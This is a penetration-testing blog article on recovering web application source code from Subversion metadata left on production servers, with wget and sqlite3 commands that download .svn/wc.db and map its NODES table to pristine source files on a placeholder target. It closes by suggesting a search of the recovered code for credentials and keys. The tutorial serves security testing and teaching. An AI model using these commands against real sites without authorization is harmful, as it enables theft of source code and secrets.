[Editor's Note: Here is a delightful little article from my buddy, Tim Medin on recovering Subversion-related files during a penetration test or ethical hacking project. Recently, we've had several projects in which this hot little technique has been vitally important, yielding super cool information for us. -Ed.]
Give me a Dot. Give me an S. Give me a V. Give me an N. Give me source code!
I think most Web Application Penetration Testers would agree that source code access can increase the speed and accuracy in finding vulnerabilities. Sadly, many times we don't have access to the source code. Fortunately for us pen testers, admins and developers can inadvertently leave the code around for us.
Many times, when code is moved into production, the source directory will be zipped/tarred/rarred/whatevs-ed and uploaded to the server. Other times, a copy of the code is checked out straight from the repository. If either method is done incorrectly, unneeded repository files will be left on the production server. We can use this to our advantage to snag some righteous code.
In Subversion 1.6 (and earlier), you could view all the entries in Subversion by looking at the aptly named "entries" file. This file contains the names of the files and directories under source control. As each directory has its own .svn directory, you needed to walk the entire tree to access the files and all the entries files. Once armed with that information, you could access the source of the file in the text-base directory.
If, for example, the site contains the .svn directories and there was an index.php file, it can be accessed via http://somedomain.com/.svn/text-base/index.php.svn-base. Sadly, many times the web server will detect the .php in the file name, even though it isn't at the end, and execute the file instead of displaying the source. Of course, we want to see the source. Fortunately, the latest versions of the Subversion client will help us out.
With Subversion 1.7 and later, a new sqlite database is used to condense a lot of the information into one place. The sqlite3 database file is located at .svn/wc.db. Once you download that file using a tool such as wget (or even your browser), you can see the entire contents of the database using the following command:
$ sqlite3 wc.db .dump
Likely this will show us too much information and it won't be in a format we can easily parse, so let's look at the new file structure and figure out what we need to extract from the database.
In Subversion 1.7 (and presumably future versions), the directory structure is quite flat. Instead of each directory containing its own .svn directory and pristine files, all the files are stored in a directory structure similar to .svn/pristine/00/001761b07f92b4c9053ce2878cc338b8e06fc3a7.svn-base. The basename is a SHA1 and the parent directory is the first characters in the SHA1. It isn't immediately clear which human readable file name maps to which SHA1. Fortunately, the database contains this mapping. Let's take a look at how we can find this information.
We can browse the database using the .tables command. In the output, we see the table we want: NODES.
$ sqlite3 wc.db .tables ACTUAL_NODE NODES PRISTINE WC_LOCK EXTERNALS NODES_BASE REPOSITORY WORK_QUEUE LOCK NODES_CURRENT WCROOT
Let's take a deeper look at the NODES table. To see its structure, we can use the .schema command and a little grep-fu.
$ sqlite3 wc.db .schema | grep NODES (output condensed) CREATE TABLE NODES ( wc_id INTEGER NOT NULL REFERENCES WCROOT (id), local_relpath TEXT NOT NULL, ... checksum TEXT REFERENCES PRISTINE (checksum), ... );
After looking at the table structure, the data, and the file system, we see two columns in the NODES table that we can use to re-create the file path: local_relpath and checksum.
$ sqlite3 wc.db 'select local_relpath, checksum from NODES' index.php|$sha1$4e6a225331f9ae872db25a8f85ae7be05cea6d51 scripts/menu.js|$sha1$fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf style/style.js|$sha1$2cc5590e0ba024c3db77a13896da09b39ea74799 ...
We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion.
$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;' index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base style/style.js|.svn/pristine/2s/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base ...
The double pipe (||) is the concatenation operator and is used to combine our strings. We can use substr to chop the checksum column and extract the information we need. Ultimately, we end up with the file names as shown above.
We can then use these paths to access the files on the server, and we don't have to deal with the pesky .php in the file name, so we should be able to view the source. Here is an example scenario:
$ wget http://www.sometarget.tgt/.svn/wc.db $ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;' index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base ... $ <strong>wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base</strong> <?php // This is the index.php file ...
Of course, just having all the source code means someone could completely copy the site, but we can also search the code for inline SQL, database credentials, encryption keys, or other sensitive information. Cool! And Hot.